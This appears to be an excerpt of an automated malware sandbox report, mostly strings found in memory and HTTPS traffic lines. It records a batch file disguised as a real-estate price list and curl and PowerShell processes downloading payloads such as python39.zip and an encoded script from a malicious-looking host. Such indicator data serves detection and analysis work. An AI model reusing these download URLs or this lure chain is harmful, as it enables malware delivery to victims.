Source: python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51EFF000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204326932.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204715281.0000012D51DB5000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
Source: chromecache_2304.7.dr	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chromecache_2304.7.dr	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chromecache_2304.7.dr	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chromecache_2304.7.dr	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19037050
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F0C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F0C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: chromecache_2326.7.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: _IntegerBase.py.16.dr	String found in binary or memory: https://rosettacode.org/wiki/Tonelli-Shanks_algorithm
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0EDCD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sealingshop.click
Source: curl.exe, 00000009.00000002.2620109528.0000015DD2C60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2620109528.0000015DD2C68000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.2620207573.0000015DD2C9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sealingshop.click/app/python39.zip
Source: curl.exe, 00000009.00000002.2620109528.0000015DD2C68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sealingshop.click/app/python39.zip-oC:
Source: curl.exe, 00000009.00000002.2620109528.0000015DD2C68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sealingshop.click/app/python39.zipurlrc
Source: curl.exe, 00000003.00000002.2115821208.000001B2FC480000.00000004.00000020.00020000.00000000.sdmp, Real Estate Project Information - Catalogue - Price List 0412PH (Area - Design - Finance).bat	String found in binary or memory: https://sealingshop.click/bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs454
Source: powershell.exe, 00000005.00000002.2194147217.0000019E0F0A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sealingshop.click/config/stu
Source: powershell.exe, 00000005.00000002.2228602367.0000019E25EFD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2192544141.0000019E0BB69000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2192544141.0000019E0BBEA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2193896367.0000019E0D5A3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2193603873.0000019E0BE30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sealingshop.click/config/stu-OutFileC:
Source: curl.exe, 00000011.00000002.3104796278.0000021E0D390000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.3105015597.0000021E0D3CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sealingshop.click/py/rose_tien
Source: curl.exe, 00000011.00000002.3104796278.0000021E0D390000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sealingshop.click/py/rose_tien-oC:
Source: chromecache_2326.7.dr	String found in binary or memory: https://support.google.com/websearch/answer/106230
Source: python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202197981.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3199473048.0000012D51DF2000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3198800218.0000012D520C0000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51F07000.00000004.00000020.00020000.00000000.sdmp, _mode_ccm.cpython-39.pyc.16.dr	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: python.exe, 00000012.00000003.3202808995.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204009322.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202856613.0000012D51E84000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3202908008.0000012D51DF1000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203805160.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3206731275.0000012D51FE3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203168656.0000012D51E90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: chromecache_2326.7.dr, chromecache_2335.7.dr	String found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: _overlapped.pyd.16.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: chromecache_2326.7.dr	String found in binary or memory: https://www.google.
Source: chromecache_2304.7.dr	String found in binary or memory: https://www.google.com/_/og/promos/
Source: chromecache_2304.7.dr	String found in binary or memory: https://www.google.com/intl/en/about/products
Source: chromecache_2326.7.dr, chromecache_2335.7.dr	String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: chromecache_2304.7.dr	String found in binary or memory: https://www.google.com/url?q=https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_s
Source: chromecache_2304.7.dr	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.b6tg1FFzATM.2019.O/rt=j/m=qabr
Source: chromecache_2304.7.dr	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qcwid
Source: python.exe, 00000012.00000003.3205543689.0000012D525B9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205306513.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3203805160.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3207924474.0000012D523B3000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204623960.0000012D51EFF000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3204326932.0000012D51E77000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3205916188.0000012D51F03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: python.exe, 00000012.00000003.3108601415.0000012D515A9000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000012.00000003.3108466132.0000012D51E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: python.exe, 00000012.00000003.3108601415.0000012D515A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/psf/license/)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
